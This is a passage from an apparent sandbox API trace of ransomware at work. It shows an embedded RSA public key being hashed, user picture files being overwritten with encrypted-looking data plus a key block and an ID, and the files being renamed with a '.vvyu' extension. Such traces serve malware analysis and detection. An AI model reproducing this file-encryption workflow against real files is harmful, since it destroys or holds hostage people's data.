RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.490] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.490] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.490] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.491] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.491] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.491] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.491] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.491] GetLastError () returned 0x0 [0187.491] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.491] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.492] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.492] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.492] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6d0) returned 0x2d43778 [0187.492] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38c70 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39730 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38cb8 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.493] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0187.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39778 [0187.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39760 [0187.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0187.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0187.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.496] GetCurrentThreadId () returned 0x264 [0187.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37d08 [0187.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.497] GetCurrentThreadId () returned 0x264 [0187.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39778 [0187.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397d8 [0187.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0187.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397f0 [0187.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39790 [0187.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39760 [0187.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38cb8 | out: hHeap=0x6a0000) returned 1 [0187.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.508] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xa6c5, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xa6c5, lpOverlapped=0x0) returned 1 [0187.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.509] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa6ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.510] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.511] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.511] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.511] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.511] CloseHandle (hObject=0x584) returned 1 [0187.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0187.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0187.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.513] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\nIFn.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\nifn.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\nIFn.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\nifn.gif.vvyu")) returned 1 [0187.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.516] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.518] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d0060, ftCreationTime.dwHighDateTime=0x1d89a96, ftLastAccessTime.dwLowDateTime=0xe5600b80, ftLastAccessTime.dwHighDateTime=0x1d89de8, ftLastWriteTime.dwLowDateTime=0xe5600b80, ftLastWriteTime.dwHighDateTime=0x1d89de8, nFileSizeHigh=0x0, nFileSizeLow=0x17fea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NThXrLNnKw.gif", cAlternateFileName="NTHXRL~1.GIF")) returned 1 [0187.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38cb8 [0187.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38cb8 | out: hHeap=0x6a0000) returned 1 [0187.519] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\NThXrLNnKw.gif") returned=".gif" [0187.519] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\NThXrLNnKw.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\nthxrlnnkw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.520] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 